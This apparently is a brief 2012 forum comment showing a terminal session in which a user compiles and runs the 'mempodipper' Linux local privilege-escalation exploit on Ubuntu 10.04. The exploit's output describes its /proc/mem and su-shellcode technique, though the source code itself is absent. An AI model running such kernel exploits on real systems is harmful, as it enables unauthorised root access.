( bri | 2012. 01. 23., Mon – 20:50 )

bri:~$ gcc mempodipper.c -o mempodipper

bri:~$ who am i
bri      pts/1        2012-01-23 20:43 (:0.0)

bri:~$ ./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2214/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049ae0.
[+] Calculating su padding.
[+] Seeking to offset 0x8049ad4.
[+] Executing su with shellcode.

bri:~$ who am i
bri      pts/1        2012-01-23 20:43 (:0.0)

bri:~$ uname -sr
Linux 3.0.0-15-generic

bri:~$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04.3 LTS"

Brutal, huh?